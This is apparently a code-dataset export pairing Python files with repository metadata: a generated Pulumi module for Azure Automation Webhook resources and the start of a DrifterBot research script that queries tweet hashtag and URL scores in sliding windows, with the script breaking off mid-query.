    # end def __contains__
# end class GameMessage
| 53.892211
| 1,061
| 0.704307
| 39,113
| 300,988
| 5.21645
| 0.017155
| 0.0496
| 0.029922
| 0.041146
| 0.928927
| 0.910195
| 0.896663
| 0.882797
| 0.878126
| 0.874534
| 0
| 0.002299
| 0.20943
| 300,988
| 5,584
| 1,062
| 53.901862
| 0.854904
| 0.367898
| 0
| 0.769494
| 0
| 0.012933
| 0.234932
| 0.104999
| 0
| 0
| 0
| 0
| 0.079118
| 1
| 0.056295
| false
| 0.00038
| 0.093191
| 0.00038
| 0.213009
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3671dd9abeafb39ea161aae24d56cb50456c2cf4
| 28,850
|
py
|
Python
|
sdk/python/pulumi_azure/automation/webhook.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/automation/webhook.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/automation/webhook.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['WebhookArgs', 'Webhook']
@pulumi.input_type
class WebhookArgs:
    def __init__(__self__, *,
                 automation_account_name: pulumi.Input[str],
                 expiry_time: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 runbook_name: pulumi.Input[str],
                 enabled: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 run_on_worker_group: Optional[pulumi.Input[str]] = None,
                 uri: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Webhook resource.
        :param pulumi.Input[str] automation_account_name: The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] expiry_time: Timestamp when the webhook expires. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] runbook_name: Name of the Automation Runbook to execute by Webhook.
        :param pulumi.Input[bool] enabled: Controls if Webhook is enabled. Defaults to `true`.
        :param pulumi.Input[str] name: Specifies the name of the Webhook. Changing this forces a new resource to be created.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of input parameters passed to runbook.
        :param pulumi.Input[str] run_on_worker_group: Name of the hybrid worker group the Webhook job will run on.
        :param pulumi.Input[str] uri: URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
        """
        # required arguments are always stored
        pulumi.set(__self__, "automation_account_name", automation_account_name)
        pulumi.set(__self__, "expiry_time", expiry_time)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "runbook_name", runbook_name)
        # optional arguments are stored only when explicitly provided
        optional_args = (
            ("enabled", enabled),
            ("name", name),
            ("parameters", parameters),
            ("run_on_worker_group", run_on_worker_group),
            ("uri", uri),
        )
        for arg_name, arg_value in optional_args:
            if arg_value is not None:
                pulumi.set(__self__, arg_name, arg_value)

    @property
    @pulumi.getter(name="automationAccountName")
    def automation_account_name(self) -> pulumi.Input[str]:
        """
        The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "automation_account_name")

    @automation_account_name.setter
    def automation_account_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "automation_account_name", value)

    @property
    @pulumi.getter(name="expiryTime")
    def expiry_time(self) -> pulumi.Input[str]:
        """
        Timestamp when the webhook expires. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "expiry_time")

    @expiry_time.setter
    def expiry_time(self, value: pulumi.Input[str]):
        pulumi.set(self, "expiry_time", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="runbookName")
    def runbook_name(self) -> pulumi.Input[str]:
        """
        Name of the Automation Runbook to execute by Webhook.
        """
        return pulumi.get(self, "runbook_name")

    @runbook_name.setter
    def runbook_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "runbook_name", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Controls if Webhook is enabled. Defaults to `true`.
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Webhook. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Map of input parameters passed to runbook.
        """
        return pulumi.get(self, "parameters")

    @parameters.setter
    def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "parameters", value)

    @property
    @pulumi.getter(name="runOnWorkerGroup")
    def run_on_worker_group(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the hybrid worker group the Webhook job will run on.
        """
        return pulumi.get(self, "run_on_worker_group")

    @run_on_worker_group.setter
    def run_on_worker_group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "run_on_worker_group", value)

    @property
    @pulumi.getter
    def uri(self) -> Optional[pulumi.Input[str]]:
        """
        URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
        """
        return pulumi.get(self, "uri")

    @uri.setter
    def uri(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "uri", value)
@pulumi.input_type
class _WebhookState:
    def __init__(__self__, *,
                 automation_account_name: Optional[pulumi.Input[str]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 expiry_time: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 run_on_worker_group: Optional[pulumi.Input[str]] = None,
                 runbook_name: Optional[pulumi.Input[str]] = None,
                 uri: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Webhook resources.
        :param pulumi.Input[str] automation_account_name: The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] enabled: Controls if Webhook is enabled. Defaults to `true`.
        :param pulumi.Input[str] expiry_time: Timestamp when the webhook expires. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Webhook. Changing this forces a new resource to be created.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of input parameters passed to runbook.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] run_on_worker_group: Name of the hybrid worker group the Webhook job will run on.
        :param pulumi.Input[str] runbook_name: Name of the Automation Runbook to execute by Webhook.
        :param pulumi.Input[str] uri: URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
        """
        # every state field is optional; store only the ones actually provided
        provided_state = (
            ("automation_account_name", automation_account_name),
            ("enabled", enabled),
            ("expiry_time", expiry_time),
            ("name", name),
            ("parameters", parameters),
            ("resource_group_name", resource_group_name),
            ("run_on_worker_group", run_on_worker_group),
            ("runbook_name", runbook_name),
            ("uri", uri),
        )
        for state_name, state_value in provided_state:
            if state_value is not None:
                pulumi.set(__self__, state_name, state_value)

    @property
    @pulumi.getter(name="automationAccountName")
    def automation_account_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "automation_account_name")

    @automation_account_name.setter
    def automation_account_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "automation_account_name", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Controls if Webhook is enabled. Defaults to `true`.
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter(name="expiryTime")
    def expiry_time(self) -> Optional[pulumi.Input[str]]:
        """
        Timestamp when the webhook expires. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "expiry_time")

    @expiry_time.setter
    def expiry_time(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expiry_time", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Webhook. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Map of input parameters passed to runbook.
        """
        return pulumi.get(self, "parameters")

    @parameters.setter
    def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "parameters", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="runOnWorkerGroup")
    def run_on_worker_group(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the hybrid worker group the Webhook job will run on.
        """
        return pulumi.get(self, "run_on_worker_group")

    @run_on_worker_group.setter
    def run_on_worker_group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "run_on_worker_group", value)

    @property
    @pulumi.getter(name="runbookName")
    def runbook_name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the Automation Runbook to execute by Webhook.
        """
        return pulumi.get(self, "runbook_name")

    @runbook_name.setter
    def runbook_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "runbook_name", value)

    @property
    @pulumi.getter
    def uri(self) -> Optional[pulumi.Input[str]]:
        """
        URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
        """
        return pulumi.get(self, "uri")

    @uri.setter
    def uri(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "uri", value)
class Webhook(pulumi.CustomResource):
    # Generated Pulumi resource class.  Construction is dispatched through
    # the un-typed __init__ below into _internal_init; do not hand-edit the
    # property plumbing — regenerate from the provider schema instead.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 automation_account_name: Optional[pulumi.Input[str]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 expiry_time: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 run_on_worker_group: Optional[pulumi.Input[str]] = None,
                 runbook_name: Optional[pulumi.Input[str]] = None,
                 uri: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages an Automation Runbook's Webhook.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.automation.Account("exampleAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            sku_name="Basic")
        example_run_book = azure.automation.RunBook("exampleRunBook",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            automation_account_name=example_account.name,
            log_verbose=True,
            log_progress=True,
            description="This is an example runbook",
            runbook_type="PowerShellWorkflow",
            publish_content_link=azure.automation.RunBookPublishContentLinkArgs(
                uri="https://raw.githubusercontent.com/Azure/azure-quickstart-templates/c4935ffb69246a6058eb24f54640f53f69d3ac9f/101-automation-runbook-getvms/Runbooks/Get-AzureVMTutorial.ps1",
            ))
        example_webhook = azure.automation.Webhook("exampleWebhook",
            resource_group_name=example_resource_group.name,
            automation_account_name=example_account.name,
            expiry_time="2021-12-31T00:00:00Z",
            enabled=True,
            runbook_name=example_run_book.name,
            parameters={
                "input": "parameter",
            })
        ```

        ## Import

        Automation Webhooks can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:automation/webhook:Webhook TestRunbook_webhook /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/webhooks/TestRunbook_webhook
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] automation_account_name: The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] enabled: Controls if Webhook is enabled. Defaults to `true`.
        :param pulumi.Input[str] expiry_time: Timestamp when the webhook expires. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Webhook. Changing this forces a new resource to be created.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of input parameters passed to runbook.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] run_on_worker_group: Name of the hybrid worker group the Webhook job will run on.
        :param pulumi.Input[str] runbook_name: Name of the Automation Runbook to execute by Webhook.
        :param pulumi.Input[str] uri: URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: WebhookArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages an Automation Runbook's Webhook.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.automation.Account("exampleAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            sku_name="Basic")
        example_run_book = azure.automation.RunBook("exampleRunBook",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            automation_account_name=example_account.name,
            log_verbose=True,
            log_progress=True,
            description="This is an example runbook",
            runbook_type="PowerShellWorkflow",
            publish_content_link=azure.automation.RunBookPublishContentLinkArgs(
                uri="https://raw.githubusercontent.com/Azure/azure-quickstart-templates/c4935ffb69246a6058eb24f54640f53f69d3ac9f/101-automation-runbook-getvms/Runbooks/Get-AzureVMTutorial.ps1",
            ))
        example_webhook = azure.automation.Webhook("exampleWebhook",
            resource_group_name=example_resource_group.name,
            automation_account_name=example_account.name,
            expiry_time="2021-12-31T00:00:00Z",
            enabled=True,
            runbook_name=example_run_book.name,
            parameters={
                "input": "parameter",
            })
        ```

        ## Import

        Automation Webhooks can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:automation/webhook:Webhook TestRunbook_webhook /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/webhooks/TestRunbook_webhook
        ```

        :param str resource_name: The name of the resource.
        :param WebhookArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Resolve which overload the caller used (typed WebhookArgs bag vs.
        # keyword arguments) and forward to the single real initializer.
        resource_args, opts = _utilities.get_resource_args_opts(WebhookArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                      resource_name: str,
                      opts: Optional[pulumi.ResourceOptions] = None,
                      automation_account_name: Optional[pulumi.Input[str]] = None,
                      enabled: Optional[pulumi.Input[bool]] = None,
                      expiry_time: Optional[pulumi.Input[str]] = None,
                      name: Optional[pulumi.Input[str]] = None,
                      parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                      resource_group_name: Optional[pulumi.Input[str]] = None,
                      run_on_worker_group: Optional[pulumi.Input[str]] = None,
                      runbook_name: Optional[pulumi.Input[str]] = None,
                      uri: Optional[pulumi.Input[str]] = None,
                      __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: validate required inputs (skipped when
            # rehydrating from an existing URN) and build the property bag.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = WebhookArgs.__new__(WebhookArgs)
            if automation_account_name is None and not opts.urn:
                raise TypeError("Missing required property 'automation_account_name'")
            __props__.__dict__["automation_account_name"] = automation_account_name
            __props__.__dict__["enabled"] = enabled
            if expiry_time is None and not opts.urn:
                raise TypeError("Missing required property 'expiry_time'")
            __props__.__dict__["expiry_time"] = expiry_time
            __props__.__dict__["name"] = name
            __props__.__dict__["parameters"] = parameters
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["run_on_worker_group"] = run_on_worker_group
            if runbook_name is None and not opts.urn:
                raise TypeError("Missing required property 'runbook_name'")
            __props__.__dict__["runbook_name"] = runbook_name
            __props__.__dict__["uri"] = uri
        super(Webhook, __self__).__init__(
            'azure:automation/webhook:Webhook',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            automation_account_name: Optional[pulumi.Input[str]] = None,
            enabled: Optional[pulumi.Input[bool]] = None,
            expiry_time: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None,
            run_on_worker_group: Optional[pulumi.Input[str]] = None,
            runbook_name: Optional[pulumi.Input[str]] = None,
            uri: Optional[pulumi.Input[str]] = None) -> 'Webhook':
        """
        Get an existing Webhook resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] automation_account_name: The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] enabled: Controls if Webhook is enabled. Defaults to `true`.
        :param pulumi.Input[str] expiry_time: Timestamp when the webhook expires. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Webhook. Changing this forces a new resource to be created.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of input parameters passed to runbook.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] run_on_worker_group: Name of the hybrid worker group the Webhook job will run on.
        :param pulumi.Input[str] runbook_name: Name of the Automation Runbook to execute by Webhook.
        :param pulumi.Input[str] uri: URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        # State lookups use the dedicated state bag, not WebhookArgs.
        __props__ = _WebhookState.__new__(_WebhookState)
        __props__.__dict__["automation_account_name"] = automation_account_name
        __props__.__dict__["enabled"] = enabled
        __props__.__dict__["expiry_time"] = expiry_time
        __props__.__dict__["name"] = name
        __props__.__dict__["parameters"] = parameters
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["run_on_worker_group"] = run_on_worker_group
        __props__.__dict__["runbook_name"] = runbook_name
        __props__.__dict__["uri"] = uri
        return Webhook(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="automationAccountName")
    def automation_account_name(self) -> pulumi.Output[str]:
        """
        The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "automation_account_name")

    @property
    @pulumi.getter
    def enabled(self) -> pulumi.Output[Optional[bool]]:
        """
        Controls if Webhook is enabled. Defaults to `true`.
        """
        return pulumi.get(self, "enabled")

    @property
    @pulumi.getter(name="expiryTime")
    def expiry_time(self) -> pulumi.Output[str]:
        """
        Timestamp when the webhook expires. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "expiry_time")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Specifies the name of the Webhook. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def parameters(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        Map of input parameters passed to runbook.
        """
        return pulumi.get(self, "parameters")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @property
    @pulumi.getter(name="runOnWorkerGroup")
    def run_on_worker_group(self) -> pulumi.Output[Optional[str]]:
        """
        Name of the hybrid worker group the Webhook job will run on.
        """
        return pulumi.get(self, "run_on_worker_group")

    @property
    @pulumi.getter(name="runbookName")
    def runbook_name(self) -> pulumi.Output[str]:
        """
        Name of the Automation Runbook to execute by Webhook.
        """
        return pulumi.get(self, "runbook_name")

    @property
    @pulumi.getter
    def uri(self) -> pulumi.Output[str]:
        """
        URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
        """
        return pulumi.get(self, "uri")
| 47.295082
| 248
| 0.661906
| 3,518
| 28,850
| 5.221148
| 0.06481
| 0.080248
| 0.080793
| 0.061084
| 0.913654
| 0.897866
| 0.88333
| 0.872115
| 0.865309
| 0.853332
| 0
| 0.007161
| 0.240035
| 28,850
| 609
| 249
| 47.372742
| 0.830604
| 0.400589
| 0
| 0.748447
| 1
| 0
| 0.10158
| 0.022261
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161491
| false
| 0.003106
| 0.015528
| 0
| 0.273292
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
36a1f1a7eaa2b918a8b0659cd0945088f1b7b7bb
| 14,486
|
py
|
Python
|
metric/time_series_scores.py
|
IUNetSci/DrifterBot
|
05c502fcf9a626321ca20ff83c7c7e5e03cd221d
|
[
"MIT"
] | 13
|
2020-05-28T21:18:26.000Z
|
2022-02-21T09:19:23.000Z
|
metric/time_series_scores.py
|
IUNetSci/DrifterBot
|
05c502fcf9a626321ca20ff83c7c7e5e03cd221d
|
[
"MIT"
] | 5
|
2020-05-20T23:15:49.000Z
|
2020-05-27T00:32:36.000Z
|
metric/time_series_scores.py
|
IUNetSci/DrifterBot
|
05c502fcf9a626321ca20ff83c7c7e5e03cd221d
|
[
"MIT"
] | 8
|
2020-08-17T10:52:12.000Z
|
2022-01-20T15:48:15.000Z
|
import psycopg2
from psycopg2.extensions import AsIs
import numpy as np
import pandas as pd
import os
# Twitter screen names of the seed news accounts the drifter bots start from.
INIT_SEEDS = [
    'USATODAY',
    'thenation',
    'washingtonpost',
    'WSJ',
    'BreitbartNews',
]  # get their twitter user ids later.
# Maps each seed account to the list of drifter-bot screen names seeded with
# it.  Fill in your own bots' screen names for each seed.
# FIX: the original placeholder `[<'drifter_scren_name'>,...]` was not valid
# Python syntax and made this module unimportable; the lists now default to
# empty, which is also what the other seeds already used.
INIT_SEED_MAP = {
    'thenation': [],  # e.g. ['my_drifter_screen_name', ...]
    'washingtonpost': [],
    'USATODAY': [],
    'WSJ': [],
    'BreitbartNews': []
}
# Maps a drifter bot's real screen name to an anonymized label ('bot<id>')
# used in exported CSV file names.  Placeholder entries must be replaced
# with your own bots' screen names before running.
BOT_NAME_MASK = {
    '<you_drifter_screen_name>': 'bot<id>',
}
HASHTAG_USER_TL_SLIDING_WIN_FOR_EACH_BOT = """
SELECT
distinct tw_score.day,
AVG(tw_score.hashtag_score)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS hashtag_mean,
VARIANCE(tw_score.hashtag_score)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS hashtag_var,
count(*)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS tw_count
FROM
(
SELECT
DISTINCT usr_timeline.tweet_id,
bot.screen_name,
usr_timeline.hashtag_score,
date_trunc('day', usr_timeline.created_at) AS day, -- date
usr_timeline.created_at
FROM
tweet usr_timeline, bot
WHERE
usr_timeline.user_id = bot.twitter_user_id
AND usr_timeline.created_at < DATE '2019-12-02'
AND bot.screen_name = '{}'
AND usr_timeline.hashtag_score is not NULL
ORDER BY usr_timeline.created_at
) AS tw_score
order by tw_score.day;
"""
URL_USER_TL_SLIDING_WIN_FOR_EACH_BOT = """
SELECT
distinct tw_score.day,
AVG(tw_score.url_score)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS url_mean,
VARIANCE(tw_score.url_score)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS url_var,
count(*)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS tw_count
FROM
(
SELECT
DISTINCT usr_timeline.tweet_id,
bot.screen_name,
usr_timeline.url_score,
date_trunc('day', usr_timeline.created_at) AS day,
usr_timeline.created_at
FROM
tweet usr_timeline, bot
WHERE
usr_timeline.user_id = bot.twitter_user_id
AND usr_timeline.created_at < DATE '2019-12-02'
AND bot.screen_name = '{}'
AND usr_timeline.url_score is not null
ORDER BY usr_timeline.created_at
) AS tw_score
order by tw_score.day;
"""
HASHTAG_HOME_TL_SLIDING_WIN_FOR_EACH_BOT = """
SELECT
distinct tw_score.day,
AVG(tw_score.hashtag_score)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS hashtag_mean,
VARIANCE(tw_score.hashtag_score)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS hashtag_var,
count(*)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS tw_count
FROM
(
SELECT
DISTINCT tw.tweet_id,
tw.hashtag_score,
date_trunc('day', checked_at) AS day,
checked_at
FROM
home_timeline ht, home_timeline_tweets ht_tw, tweet tw, bot
WHERE
ht.bot_id = bot.bot_id
AND checked_at < DATE '2019-12-02'
AND ht.id = ht_tw.htl_id
AND ht_tw.tw_id = tw.tweet_id
AND bot.screen_name = '{}'
AND tw.hashtag_score is not null
ORDER BY checked_at
) AS tw_score
ORDER BY tw_score.day;
"""
URL_HOME_TL_SLIDING_WIN_FOR_EACH_BOT = """
SELECT
distinct tw_score.day,
AVG(tw_score.url_score)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS url_mean,
VARIANCE(tw_score.url_score)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS url_var,
count(*)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS tw_count
FROM
(
SELECT
DISTINCT tw.tweet_id,
tw.url_score,
date_trunc('day', checked_at) AS day,
checked_at
FROM
home_timeline ht, home_timeline_tweets ht_tw, tweet tw, bot
WHERE
ht.bot_id = bot.bot_id
AND checked_at < DATE '2019-12-02'
AND ht.id = ht_tw.htl_id
AND ht_tw.tw_id = tw.tweet_id
AND bot.screen_name = '{}'
AND tw.url_score is not null
ORDER BY checked_at
) AS tw_score
ORDER BY tw_score.day;
"""
URL_FRIEND_USR_TIMELINE = """
SELECT
distinct friend_tw_scores.day,
